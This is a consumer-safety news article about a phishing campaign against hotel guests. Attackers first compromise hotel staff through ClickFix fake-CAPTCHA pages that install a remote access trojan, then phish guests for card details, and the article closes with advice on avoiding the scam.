If you’ve booked a hotel through a platform like Booking.com or Expedia, beware any communication that directs you to confirm your payment details to hold your reservation. Threat actors are targeting the hospitality industry with a phishing campaign designed to steal from travelers.
As outlined by security firm Sekoia.io and reported by The Hacker News, the scheme is referred to as “I Paid Twice” because hotel customers are eventually conned into handing over their banking information. Scammers contact guests via WhatsApp or email about their booking, saying that they need to verify their payment or risk cancellation. The link goes to a fake landing page that looks like Booking.com or Expedia, where victims are prompted to provide card information.
This isn’t the first scam to target Booking.com: Scammers have previously spoofed the site to spread malware directly to users via both fake CAPTCHAs and homograph attacks, which exploit similar characters in the URL to redirect to a malicious website.
This multi-step campaign actually begins when hackers target hotels themselves with ClickFix attacks, a type of social engineering attack designed to trick users into downloading malware via fake error messages or CAPTCHA forms. (I’ve covered a handful of ClickFix schemes, such as those spread via AI-generated instructional videos on TikTok and expired invite links on Discord.)
The scam runs as follows: Hotel managers receive emails from compromised accounts with phishing links that redirect to a supposed reCAPTCHA page. This is the ClickFix component, as targets are instructed to complete the challenge to “ensure the security of your connection.” A couple of redirects lead to the user copy and execute a PowerShell command that downloads a Remote Access Trojan (like PureRAT) to their device.
What do you think so far?
Once the malware has been delivered, it allows threat actors remote access, including control of the mouse and keyboard, data exfiltration, command execution, file uploads and downloads, keylogging, and webcam and microphone capture. Hackers are then able to steal admin credentials to gain access to booking platforms and send the aforementioned phishing emails to hotel guests—or they can sell the information to other cybercriminals.
Don’t fall for the hotel booking scam
You can’t control whether a hotel manager unwittingly hands over access to your booking information. But you can avoid further compromising your personal and financial data by staying vigilant to any unexpected communication about your reservation. A reputable hotel probably won’t contact you via a booking platform (nor will the platform itself) to demand payment for holding a reservation you’ve already confirmed.
This sense of urgency is meant to trick you into acting quickly, so if you’re not sure what’s going on, call the hotel directly using the number on their official website (not from the email or WhatsApp message). Don’t click any links, and don’t enter any information unless you have confirmed that you are on a legitimate booking platform or hotel website.